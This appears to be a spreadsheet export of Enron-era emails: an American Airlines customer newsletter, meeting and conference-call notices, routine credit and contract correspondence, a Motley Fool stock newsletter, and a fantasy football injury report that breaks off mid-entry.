* Experience How Comfortable International Travel Can Be_x000D_
* Fly American To Your Favorite Winter Sports Destination_x000D_
* Carry-On Baggage Information_x000D_
- - -_x000D_
NEWSCAAST_x000D_
=========_x000D_
Important Travel Information For Our Customers_x000D_
----------------------------------------------_x000D_
We understand that there are times when you prefer to standby for a flight other than your scheduled flight.  However, to comply with new Federal security rules, American will not allow customers with checked baggage to standby for an alternate flight. This effort is part of American Airlines continuing commitment to the security of our customers.  For all of the latest travel information, log on to www.aa.com/travelinfo.http://www.aa.com/travelinfo _x000D_
AA.com Flight Status Notification_x000D_
---------------------------------_x000D_
Whether taking off or picking up someone, finding out the status of any American Airlines or American Eagle flight is important.  Once you sign up for Flight Status Notification, we'll notify you of flight arrival or departure times, as well as gate and baggage information - no matter where you are.  You choose when and how you want to be notified, whether it's a voice message to any type of phone, or a text message to a cell phone, alphanumeric pager, wireless personal digital assistant (PDA), or a regular email account. To register, simply visit www.aa.com/notify or click the link.http://www.aa.com/notify _x000D_
Get Your Boarding Pass At The Curb With ONESTOP Curbside_x000D_
--------------------------------------------------------_x000D_
To speed your way through the airport, ONESTOP Curbside check-in is available at more than 80 airports for electronic or paper ticketed passengers, traveling domestically, with or without a pre-reserved seat.  Visit www.aa.com/curbside for more information and a list of locations offering the convenience of ONESTOP Curbside.http://www.aa.com/curbside _x000D_
Enjoy The Convenience Of The ADMIRALS CLUB EXECUTIVE CENTER_x000D_
-----------------------------------------------------------_x000D_
Your paid conference room booking at the ADMIRALS CLUB EXECUTIVE CENTER or ADMIRALS CLUB allows access to our facilities for your next meeting.  And, you don't have to be a member or traveling that day.  Your guests fly in, meet at the airport and fly out without the expense for hotels and taxis.  For more information, conference room rates or to make a conference room reservation, call 1-800-237-7971.http://www.aa.com/programsandservices _x000D_
It's Your Chance To Vote For AADVANTAGE_x000D_
---------------------------------------_x000D_
Each year, the Freddie Awards give frequent travelers the chance to voice their opinions about their favorite frequent travel programs.  As a valued member of our AADVANTAGE travel rewards program, we would like to invite you to vote and give recognition to your favorite airline travel program.  Visit www.freddieawards.com or click the link for more information and to cast your vote before March 15, 2002, for the American Airlines AADVANTAGE program!http://www.freddieawards.com _x000D_
EARN MORE MILES WITH AADVANTAGE_x000D_
===============================_x000D_
Buy AADVANTAGE Miles For Yourself Or Others_x000D_
-------------------------------------------_x000D_
Now AADVANTAGE members can purchase miles for themselves, or as a gift for others to reach the awards they desire. Using the BUYAAMILES program, AADVANTAGE members may purchase up to 15,000 miles per calendar year for their AADVANTAGE account. The GIFTAAMILES program is a unique way for AADVANTAGE members to give the gift of travel and other rewards. Log on to www.buyaamiles.points.com or click the link for more information. http://www.buyaamiles.points.com _x000D_
AIRLINE SERVICE NEWS_x000D_
====================_x000D_
Experience How Comfortable International Travel Can Be_x000D_
------------------------------------------------------_x000D_
Beginning in February, all flights to/from Europe feature American's fleet of international Boeing 767-300s and 777s. American's INTERNATIONAL FLAGSHIP SERVICE features inflight comforts such as fully flat sleeper seats in First Class, 60-inch pitch in Business Class and MORE ROOM THROUGHOUT COACH.  Plus, select 777 flights feature the unparalleled FLAGSHIP SUITE in First Class. Log on to www.aa.com/flagship or click the link for more details.http://www.aa.com/flagship _x000D_
Fly American To Your Favorite Winter Sports Destination_x000D_
-------------------------------------------------------_x000D_
Fly American Airlines/American Eagle nonstop to Crested Butte, Jackson Hole, Steamboat Springs, Telluride and Vail this winter.  We offer this seasonal service in addition to nonstop flights year-round to Albuquerque, Calgary, Colorado Springs, Denver, Durango, Reno/Lake Tahoe, Salt Lake City and Vancouver/Whistler. Log on to www.aa.com and book your winter sports vacation now!http://www.aa.com _x000D_
Carry-On Baggage Information_x000D_
----------------------------_x000D_
Please remember that you are allowed three pieces of luggage free of charge - one of which may be carried on.  FAA rules limit customers to one carry-on bag, plus one personal item. Personal items include a purse, briefcase, laptop computer or a small book-type backpack.  All carry-on items must fit either under the seat in front of you or in an overhead bin. Visit www.aa.com/travelinfo for more details.http://www.aa.com/travelinfo _x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
This is a post only email. Please do not reply to this message. For all inquiries, go to http://www.aa.com/contactaa  or send an email to webmaster@im.aa.com. _x000D_
Unsubscribe Information_x000D_
This email has been sent to SSCOTT5@ENRON.COM_x000D_
American Airlines respects your right to privacy. If you choose to unsubscribe to American Airlines AAIRMAIL messages, you will no longer receive information regarding news and special offers personalized just for you._x000D_
If you still want to unsubscribe to the American Airlines AAIRMAIL messages, please visit: www.aa.com , log in as an AADVANTAGE member, click the Profile link in the upper right corner, and uncheck the box marked "AAIRMAIL". _x000D_
American Airlines, American Eagle, AmericanConnection, AA.com, AAirmail, Net SAAver, Net SAAver And Special Offers, Net SAAver And Weekend Getaway Fares, AAdvantage, AAdvantage Gold, AAdvantage Platinum, AAdvantage Executive Platinum, AAdvantage Dial-In, American Airlines Vacations, Admirals Club, and Admirals Club Executive Center are marks of American Airlines, Inc.  American Eagle is American Airlines regional airline associate. All other trademarks referenced are trademarks of their respective companies. American Airlines is not responsible for products or services offered by other participating companies. Trans World Airlines and TWA are marks of TWA Airlines LLC. _x000D_
January 2002, Edition II _x000D_
Patent Pending _x000D_
Message-Id: &lt;20020123154601.E4C1.1177391-17044@info.aa.com&gt;_x000D_
 [IMAGE]</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 03:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'christopher.hunt@enron.com'})</t>
  </si>
  <si>
    <t>Re: Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, I also need to get some time with Shawn Cumberland... please schedule _x000D_
that too._x000D_
_x000D_
_x000D_
_x000D_
	Christopher B Hunt@ENRON_DEVELOPMENT_x000D_
	11/20/2000 11:03 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Meeting_x000D_
_x000D_
SK - I emailed him and asked him to call me to schedule some time with you _x000D_
next week.  mm_x000D_
_x000D_
Steve -_x000D_
_x000D_
I was hoping to grab you for a few minutes in San Antonio to get some "Enron _x000D_
career advice" but wasn't able to find you at a time when both of us were _x000D_
free.  Any chance I could grab 20-30 minutes this week or next?_x000D_
_x000D_
Chris_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Jun 2001 05:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dave.perrino@enron.com', 'jalexander@gibbs-bruns.com', 'linda.noske@enron.com', 'stephanie.miller@enron.com', 'alan.comnes@enron.com', 'phillip.allen@enron.com', 'steve.walton@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'barry.tycholiz@enron.com', 'don.black@enron.com', 'christi.nicolay@enron.com', 'robert.frank@enron.com', 'rebecca.cantrell@enron.com', 'susan.mara@enron.com', 'leslie.lawner@enron.com', 'donna.fulton@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">THE MEETING TIME HAS BEEN CHANGED!!!!_x000D_
_x000D_
PLEASE MARK YOUR CALENDAR_x000D_
Date:   Every Thursday_x000D_
Time:    7:30 AM Pacific, 9:30 AM Central, and 10:30 AM Eastern time_x000D_
 Number:   1-888-271-0949 _x000D_
 Host Code:  661877 (for Ray only)_x000D_
 Participant Code: 936022 (for everyone else)_x000D_
_x000D_
_x000D_
_x000D_
----- Forwarded by Bernadette Hawkins/Corp/Enron on 06/20/2001 12:43 PM -----_x000D_
_x000D_
	Ray Alvarez_x000D_
	05/31/2001 11:55 AM_x000D_
		 _x000D_
		 To: Bernadette Hawkins/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: Western Wholesale Activities - Gas &amp; Power Conf. Call_x000D_
Privileged &amp; Confidential Communication_x000D_
Attorney-Client Communication and Attorney Work Product Privileges Asserted_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Ray Alvarez/NA/Enron on 05/31/2001 11:55 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Ray Alvarez_x000D_
05/31/2001 11:54 AM_x000D_
To: Steve Walton/HOU/ECT@ECT, Susan J Mara/NA/Enron@ENRON, Alan _x000D_
Comnes/PDX/ECT@ECT, Leslie Lawner/NA/Enron@Enron, Rebecca W _x000D_
Cantrell/HOU/ECT@ECT, Donna Fulton/Corp/Enron@ENRON, Jeff _x000D_
Dasovich/NA/Enron@Enron, Christi L Nicolay/HOU/ECT@ECT, James D _x000D_
Steffes/NA/Enron@Enron, jalexander@gibbs-bruns.com, Phillip K _x000D_
Allen/HOU/ECT@ECT, Linda J Noske/HOU/ECT@ECT, Dave Perrino/SF/ECT@ECT, Don _x000D_
Black/HOU/EES@EES, Robert Frank/NA/Enron@Enron, Stephanie _x000D_
Miller/Enron@EnronXGate, Barry Tycholiz/Enron@EnronXGate_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Western Wholesale Activities - Gas &amp; Power Conf. Call_x000D_
Privileged &amp; Confidential Communication_x000D_
Attorney-Client Communication and Attorney Work Product Privileges Asserted_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PLEASE MARK YOUR CALENDAR_x000D_
Date:   Every Thursday_x000D_
Time:    1:00 pm Pacific, 3:00 pm Central, and 4:00 pm Eastern time,_x000D_
 Number:   1-888-271-0949 _x000D_
 Host Code:  661877 (for Ray only)_x000D_
 Participant Code: 936022 (for everyone else)_x000D_
_x000D_
The table of the on-going FERC issues and proceedings will be updated for use _x000D_
on today's conference call, and distributed by Bernadette Hawkins.  It is _x000D_
available to all team members on the O drive. Please feel free to revise/add _x000D_
to/ update this table as appropriate._x000D_
_x000D_
Proposed agenda for today:_x000D_
_x000D_
FERC Order of May 25 clarifying the April 26 Order re market monitoring and _x000D_
price mitigation._x000D_
_x000D_
ISO de-rating of ATC complaint- status (item 20)_x000D_
_x000D_
EPSA intervention and protest re CAISO compliance filing and proposed tariff _x000D_
amendment  (item 32)_x000D_
_x000D_
EPSA rehearing request of FERC market monitoring and mitigation order in _x000D_
EL00-95-12 (item 9d)_x000D_
_x000D_
_x000D_
Miscellaneous information items:_x000D_
_x000D_
CA legislators' suit against FERC._x000D_
_x000D_
 RTO conference is to be planned and held by FERC in the near future._x000D_
_x000D_
_x000D_
Please feel free to communicate to the group any additional agenda items you _x000D_
may have._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 08:07:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'ken.rice@enron.com', 'stanley.horton@enron.com', 'andrew.fastow@enron.com', 'david.delainey@enron.com', 'james.derrick@enron.com', 'mark.frevert@enron.com', 'richard.causey@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>Cost Savings Memo</t>
  </si>
  <si>
    <t xml:space="preserve">Attached for your information is a memo that we plan to send out to employees worldwide Monday afternoon or Tuesday morning discussing the Policy Committee's cost saving recommendations.  To the extent there are unique aspects of these policies as they apply to your business unit, please follow up with a further communication to your employees.  We will send you a list of frequently asked questions that deal with systems issues. _x000D_
_x000D_
Thank you._x000D_
_x000D_
Karen_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 05:26:32 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.cherry@enron.com'})</t>
  </si>
  <si>
    <t>RE: Enron Corp. Exposure - ETS</t>
  </si>
  <si>
    <t xml:space="preserve">Since we are no longer using Maverix, that guarantee can be done away with.    Are the rest all really with Enron?    In the underlying deals do we have any ability to ask for better than a guarantee if enron is downgraded?    _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cherry, Paul  _x000D_
Sent:	Tuesday, November 20, 2001 2:02 PM_x000D_
To:	Hayslett, Rod; Peters, Jerry; Howard, Kevin A._x000D_
Cc:	Lastovica, Karen; Sheffield, Sandy; Homan, Rita; White, Angela_x000D_
Subject:	Enron Corp. Exposure - ETS_x000D_
_x000D_
In reference to recent developments and financings, attached for your review is a consolidated listing by business entity of the Enron Corp. credit support that is held or in process. Also, I have included the unsecured trading positions._x000D_
_x000D_
If there are any questions or additional information is needed, please advise._x000D_
_x000D_
Regards._x000D_
_x000D_
_x000D_
 &lt;&lt; File: Enron Corp EXPOSURE.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 12 Jun 2000 00:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Unfinalized Invoices</t>
  </si>
  <si>
    <t xml:space="preserve">FYI...Susan sent this memo to all gas functional groups this morning._x000D_
_x000D_
---------------------- Forwarded by Brent A Price/HOU/ECT on 06/12/2000 07:37 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Susan Harrison_x000D_
06/12/2000 01:33 PM_x000D_
To: Brent A Price/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Dec 2000 02:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'maria.pavlou@enron.com', 'ranelle.paladino@enron.com'})</t>
  </si>
  <si>
    <t>Do we need to give notice to customers before we shut in receipt points due _x000D_
to off-spec gas?  Sec. 44 of the NN tariff implies to me that if a customer's _x000D_
gas has too much water, for example, we can shut it in at any time without _x000D_
notice.  Please confirm ASAP.  DF</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 08:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Updated Enron Discrepancy list</t>
  </si>
  <si>
    <t xml:space="preserve">Pretty small stuff from a dollar standpoint.  Perhaps the sky is not falling._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ben F Jacoby@ECT_x000D_
09/22/2000 04:29 PM_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Updated Enron Discrepancy list_x000D_
_x000D_
This seems too small to bother with. What do you think?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben_x000D_
---------------------- Forwarded by Ben Jacoby/HOU/ECT on 09/22/2000 02:40 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Matthew Tezyk@ENRON_DEVELOPMENT_x000D_
09/22/2000 03:30 PM_x000D_
To: Ben F Jacoby@ECT, Kay Mann@ENRON, Robert P Virgo@ECT, Brian _x000D_
Hulse/Corp/Enron@ENRON_x000D_
cc: Dan Shultz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, James _x000D_
Mayeaux/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Frank R _x000D_
Cervenka/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Updated Enron Discrepancy list_x000D_
_x000D_
Ben,_x000D_
_x000D_
Per our conversation, attached is the requested Punchlist.  The original, _x000D_
estimated value to correct all the discrepancies was approximately $250,000.  _x000D_
After our discussions with SSEP on September 19, 2000, staffing levels and an _x000D_
increased productivity correcting the discrepancies took place.  Currently, _x000D_
we estimate that SSEP has about $35,000 left to correct and we expect them to _x000D_
finish by September 30, 2000.  Please note that the aforementioned _x000D_
description does not include the discrepancy we discovered concerning _x000D_
Enclosure Area Classification relating to gas migration.  We estimate that it _x000D_
will cost approximately $2,000 per unit ($48,000) to correct.  Our _x000D_
engineering is looking at this now and we plan to have an answer on this next _x000D_
week._x000D_
_x000D_
If there is any further assistance we can provide, please contact me at _x000D_
713-646-8258._x000D_
_x000D_
Matthew Tezyk_x000D_
Project Manager_x000D_
---------------------- Forwarded by Matthew Tezyk/ENRON_DEVELOPMENT on _x000D_
09/22/2000 11:53 AM ---------------------------_x000D_
   _x000D_
	Enron Engineering &amp; Construction Company_x000D_
	From:  Frank R Cervenka                           09/21/2000 01:47 PM_x000D_
	_x000D_
_x000D_
To: armstrongm604@cs.com_x000D_
cc: Matthew Tezyk/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
michael.storm@ss.ps.ge.com _x000D_
Subject: Updated Enron Discrepancy list_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 11:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FoolWatch: Software 2001 Roundtable</t>
  </si>
  <si>
    <t>__________________________________________________________________x000D_
_x000D_
F O O L W A T C H_x000D_
Tuesday, December 12, 2000_x000D_
_x000D_
alewis@ect.enron.com_x000D_
__________________________________________________________________x000D_
_x000D_
Close   Change  %Change_x000D_
_x000D_
FOOL 50   1,774.77   -6.46   -0.36%_x000D_
DJIA     10,768.27  +42.47   +0.40%_x000D_
S&amp;P 500   1,371.18   -9.02   -0.65%_x000D_
NASDAQ    2,931.77  -83.33   -2.76%_x000D_
(Numbers as of 5:00 p.m. ET)_x000D_
_x000D_
_x000D_
SPONSORED BY: Scottrade_x000D_
Scottrade: $7 Trades, 120+ offices, personal brokers, FREE_x000D_
REAL TIME Quotes &amp; charts. Check out our financial services:_x000D_
CDs, Bonds, Mutual Funds, no setup fees on IRAs. Apply now!_x000D_
http://www.lnksrv.com/m.asp?i=241444_x000D_
_x000D_
_x000D_
NEWS: SOFTWARE 2001 ROUNDTABLE_x000D_
Fools discuss the outlook for the storage, Web-testing,_x000D_
security, and video game software sectors._x000D_
http://www.fool.com/m.asp?i=241445_x000D_
_x000D_
DRIP PORT: PEPSICO: BIGGER, BADDER, BETTER_x000D_
Brian Graney takes an initial glance at PepsiCo's $13.5 billion_x000D_
purchase of Quaker Oats._x000D_
http://www.fool.com/m.asp?i=241446_x000D_
_x000D_
RESEARCH: THE DOWNFALL OF INTERNET CONSULTANTS_x000D_
Todd Lebor on the importance of looking beyond a company's_x000D_
"sizzle" before investing in it._x000D_
http://www.fool.com/m.asp?i=241447_x000D_
_x000D_
RULE BREAKER: CAN CELERA CASH IN?_x000D_
A year after the Celera buy, Tom Jacobs asks if the ceiling for_x000D_
bioinformation is high enough for Rule Breakerdom._x000D_
http://www.fool.com/m.asp?i=241448_x000D_
_x000D_
RULE MAKER: DON'T WRITE OFF INTEL_x000D_
The personal computer isn't quite as dead as some investors_x000D_
believe. Richard McCaffery tells why._x000D_
http://www.fool.com/m.asp?i=241449_x000D_
_x000D_
ON SALE NOW: 17 INDUSTRIES TO WATCH IN 2001_x000D_
Only a few days left to order Industry Focus 2001 at the early_x000D_
bird discount price!_x000D_
http://www.lnksrv.com/m.asp?i=241450_x000D_
_x000D_
NEWS: TOP STORIES_x000D_
Get the latest on Lowe's, Monsanto, and AMD._x000D_
http://www.fool.com/m.asp?i=241451_x000D_
_x000D_
FOOL ON THE HILL: LUCENT'S FREE CASH FLOW_x000D_
Whitney Tilson on how free cash flow and operating-activities_x000D_
cash flow aren't necessarily the same._x000D_
http://www.fool.com/m.asp?i=241452_x000D_
_x000D_
SMALL CAP/FOOLISH 8: SMALL CAPS AND INSIDER HOLDINGS_x000D_
With some digging, the level of insider holdings can tell_x000D_
small-cap investors a lot._x000D_
http://www.fool.com/m.asp?i=241453_x000D_
_x000D_
FOOLISH FOUR: GIVING TO GRANDKIDS_x000D_
Want to give your grandkids the gift of financial security? Try_x000D_
giving a trust or an Education IRA._x000D_
http://www.fool.com/m.asp?i=241454_x000D_
_x000D_
FOOLISH WORKSHOP: HIGH RETURNS, LOW RISK?_x000D_
Looking for ways to get the highest returns with the lowest_x000D_
volatility? The Workshop Portfolio explores the_x000D_
http://www.fool.com/m.asp?i=241455_x000D_
_x000D_
FOOL PLATE SPECIAL: DOUBLECLICK DROPS ANOTHER SHOE_x000D_
Will the dot-coms ever stop gasping for air?_x000D_
http://www.fool.com/m.asp?i=241456_x000D_
_x000D_
BREAKFAST WITH THE FOOL: DOUBLECLICK'S DOUBLE TAKE_x000D_
Online advertising powerhouse DoubleClick warns. Figures._x000D_
http://www.fool.com/m.asp?i=241457_x000D_
_x000D_
COMMUNITY: HOT TOPICS_x000D_
Join the conversations about Starbucks, Berkshire Hathaway,_x000D_
and Nokia._x000D_
http://www.fool.com/m.asp?i=241458_x000D_
_x000D_
__________________________________________________________________x000D_
_x000D_
My Portfolio: http://www.fool.com/m.asp?i=241459_x000D_
My Discussion Boards: http://www.fool.com/m.asp?i=241460_x000D_
My Fool: http://www.fool.com/m.asp?i=241461_x000D_
Fool.com Home: http://www.fool.com/m.asp?i=241462_x000D_
My E-Mail Settings: http://www.fool.com/m.asp?i=241463_x000D_
_x000D_
_x000D_
SPONSORED BY: Scottrade_x000D_
Scottrade: $7 Trades, 120+ offices, personal brokers, FREE_x000D_
REAL TIME Quotes &amp; charts. Check out our financial services:_x000D_
CDs, Bonds, Mutual Funds, no setup fees on IRAs. Apply now!_x000D_
http://www.lnksrv.com/m.asp?i=241464_x000D_
_x000D_
_x000D_
GET A HEAD START ON 2001_x000D_
Start your investing research now with Industry_x000D_
Focus 2001. Available in electronic download or hard copy._x000D_
http://www.lnksrv.com/m.asp?i=241465_x000D_
_x000D_
FREE PREVIEW OF WIRELESS 201_x000D_
Get a sneak peek of this best-seller at Soapbox.com_x000D_
http://www.lnksrv.com/m.asp?i=241466_x000D_
_x000D_
FOOL DIRECT E-MAIL SERVICES_x000D_
Need to change your address or unsubscribe? You_x000D_
can also temporarily suspend mail delivery._x000D_
http://www.fool.com/community/freemail/freemaillogin.asp?email=alewis@ect.enro_x000D_
n.com_x000D_
_x000D_
Have ideas about how we can improve the Fool Direct or new_x000D_
e-mail products you'd like to see? Try our discussion board:_x000D_
http://www.fool.com/m.asp?i=241467_x000D_
_x000D_
__________________________________________________________________x000D_
(c) Copyright 2000, The Motley Fool. All rights reserved. This_x000D_
material is for personal use only. Republication and_x000D_
redissemination, including posting to news groups, is expressly_x000D_
prohibited without the prior written consent of The Motley Fool._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MsgId: _x000D_
msg-28448-2000-12-12_18-18-39-6591909_1_Plain_MessageAddress.msg-18:56:16(12-1_x000D_
2-2000)_x000D_
X-Version: mailer-sender-master,v 1.84_x000D_
X-Version: mailer-sender-daemon,v 1.84_x000D_
Message-Recipient: alewis@ect.enron.com</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 07:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'thomas.suffield@enron.com', 'gregg.penman@enron.com', 'fred.mitro@enron.com', 'rusty.stevens@enron.com', 'laura.luce@enron.com'})</t>
  </si>
  <si>
    <t>Here's where I am:_x000D_
_x000D_
_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 4 Jun 1999 03:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brianp@aiglincoln.com'})</t>
  </si>
  <si>
    <t>I will probably be staying at the Savoy. I will be there from July 18 to the _x000D_
28th.</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 04:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New ISDA Worksheet: Juniper</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the worksheet for the external ISDA, not any RMT ISDA, to be _x000D_
drafted and sent for review to Juniper._x000D_
_x000D_
thanks_x000D_
brant_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Brant Reves/HOU/ECT on 12/12/2000 12:05 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Brant Reves_x000D_
12/07/2000 03:29 PM_x000D_
To: Susan Bailey/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Tana _x000D_
Jones/HOU/ECT@ECT, Stephanie Panus/NA/Enron@Enron_x000D_
cc: Patrick Johnson/HOU/ECT@ECT _x000D_
Subject: Juniper RMT_x000D_
_x000D_
Please prepare a draft contract per the attached credit terms and forward to _x000D_
Patrick Johnson for distribution._x000D_
_x000D_
thanks_x000D_
brant _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Brant Reves/HOU/ECT on 12/07/2000 03:22 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Brant Reves_x000D_
12/06/2000 11:30 AM_x000D_
To: Susan Bailey/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Tana _x000D_
Jones/HOU/ECT@ECT, Stephanie Panus/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Juniper RMT_x000D_
_x000D_
Please prepare a RMT ISDA agreement between ENA and Juniper Energy L.P. and _x000D_
forward executable copies to Les Clark_x000D_
_x000D_
your contact on this is Patrick Johnson, 3-9453_x000D_
_x000D_
thanks for your help_x000D_
brant_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 04:22:21 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for Feeley's FFL 12/21/01</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
[IMAGE] =09_x000D_
 Attention Fantasy Players! Cant find that perfect gift? Let MVP.com make i=_x000D_
t easy for you! Save 10% on your next purchase when you purchase a Gift Cer=_x000D_
tificate from now until 12/27/01. Click Here for Details .     Brought to y=_x000D_
ou by   Sponsorship Bar You are receiving these e-reports because you have =_x000D_
signed up for CBS SportsLine.com Fantasy Football.  To customize, reschedul=_x000D_
e, or turn off these reports please  click here    NFL Reports, Player Upda=_x000D_
tes  [IMAGE]Latest NFL Player News  Shannon Sharpe , TE BAL - Carsons Wildc=_x000D_
ats Updated 12/20/01 Sharpe (leg) practiced on Wednesday. He is expected to=_x000D_
 play this week.   Drew Brees , QB SD - Free Agent Updated 12/20/01 There s=_x000D_
till seems to be a chance Brees might play this week or before the season e=_x000D_
nds, says the San Diego Union-Tribune . He has been taking snaps with the f=_x000D_
irst team in practice. "I'm not going to say that he will play, (but) could=_x000D_
 he play? Yes," Mike Riley. "But I'm not going to say he will for sure.   K=_x000D_
evan Barlow , RB SF - Drunk Monkeys Updated 12/20/01 Despite scoring on two=_x000D_
 short TD runs last week, Barlow is not offically the Niners' goal-line bac=_x000D_
k, says the Contra-Costa Times. "It's a coincidence," Barlow said. "It was =_x000D_
my turn in the rotation to be in there." The two backs will continue to spl=_x000D_
it carries.   Terrell Owens , WR SF - Dans Dawgs Updated 12/20/01 Owens (hi=_x000D_
p) did not practice on Wednesday. He is still expected to play this week.  =_x000D_
 Jeff Garcia , QB SF - Feeleys Fanatics Updated 12/20/01 Garcia (ribs) has =_x000D_
been downgraded to questionable, but he still expects to play this week. Ti=_x000D_
m Rattay took snaps with the first team on Wednesday.   Ike Hilliard , WR N=_x000D_
YG - Chargers Updated 12/20/01 The New York Daily News says the pain in Hil=_x000D_
liard's toe has worsened. He aggravated the injury in Week 14, but he is ex=_x000D_
pected to play against Seattle.   Santana Moss , WR NYJ - Feeleys Fanatics =_x000D_
Updated 12/20/01 Moss (quadriceps) has returned to practice. He might be ab=_x000D_
le to play this week.  Steve McNair , QB TEN - Feeleys Fanatics Updated 12/=_x000D_
20/01 McNair has missed some practice time this week because of a back inju=_x000D_
ry. He is still expected to start.   Todd Bouman , QB MIN - Free Agent Upda=_x000D_
ted 12/20/01 Bouman (thumb) missed practice on Wednesday. He is expected to=_x000D_
 play this week, although the Minneapolis Star-Tribune says he might have t=_x000D_
o throw in pain. "We think he'll be practicing full speed on Thursday and F=_x000D_
riday," Dennis Green said. "I think he'll get accustomed to how he's got to=_x000D_
 throw the ball and I think he will be effective."  Terrence Wilkins , WR I=_x000D_
ND - Free Agent Updated 12/20/01 Wilkins will sit out again this week with =_x000D_
a hamstring injury. Reggie Wayne will be the No. 2 receiver against the Jet=_x000D_
s.   James McKnight , WR MIA - Free Agent Updated 12/20/01 McKnight is list=_x000D_
ed as probable for this week's game with a back injury. He is expected to p=_x000D_
lay against New England.   Larry Foster , WR DET - Free Agent Updated 12/20=_x000D_
/01 Foster (thigh) might not be able to play this week. Bert Emanuel may ta=_x000D_
ke his place as Detroit's No. 2 receiver.   James Stewart , RB DET - Free A=_x000D_
gent Updated 12/20/01 Stewart (hip) practiced on Wednesday. He is expected =_x000D_
to play this week.   Bert Emanuel , WR DET - Free Agent Updated 12/20/01 Em=_x000D_
anuel returned to practice on Wednesday. If his knee shows no sign of swell=_x000D_
ing, he should play this week, says the Detroit Free Press.   Aaron Shea , =_x000D_
TE CLE - Free Agent Updated 12/20/01 Shea did not participate in team drill=_x000D_
s on Wednesday. He is not expected to play this week, and O.J. Santiago wil=_x000D_
l start in his place.   Scott Mitchell , QB CIN - Free Agent Updated 12/20/=_x000D_
01 Mitchell strained his right rib cage on Wednesday. He is doubtful for Su=_x000D_
nday's game, and now Kevin Thompson will back up Jon Kitna, who is expected=_x000D_
 to start although he still has a finger injury.   Wesley Walls , TE CAR - =_x000D_
Drunk Monkeys Updated 12/20/01 Walls (ankle) particpated in some drills on =_x000D_
Wednesday. He is listed as questionable, and Kris Mangum will start in Wall=_x000D_
s' place if he cannot play.   Muhsin Muhammad , WR CAR - Drunk Monkeys Upda=_x000D_
ted 12/20/01 Muhammad (turf toe) did not practice on Wednesday. He is liste=_x000D_
d as questionable and Isaac Byrd will start if Muhammad can't play.   Terry=_x000D_
 Allen , RB BAL - Free Agent Updated 12/20/01 Allen is ready to assume a la=_x000D_
rger workload, says the Baltimore Sun . He may start against the Bengals th=_x000D_
is week. "I expect to see more time but I'm still not 100 percent," Allen s=_x000D_
aid. "My hand is going to bother me but I need to be out there on the field=_x000D_
 to help this team."  Elvis Grbac , QB BAL - Free Agent Updated 12/20/01 Do=_x000D_
n't expect to see Grbac benched this year, or anytime soon, Brian Billick t=_x000D_
old the Baltimore Sun. "He's my quarterback now, he's going to be my quarte=_x000D_
rback next year, hopefully the year after that and the year after that," Bi=_x000D_
llick said. "The only thing that would change that is if he chooses to reti=_x000D_
re or God forbid, he'd get a career-ending injury."   Chris Chandler , QB A=_x000D_
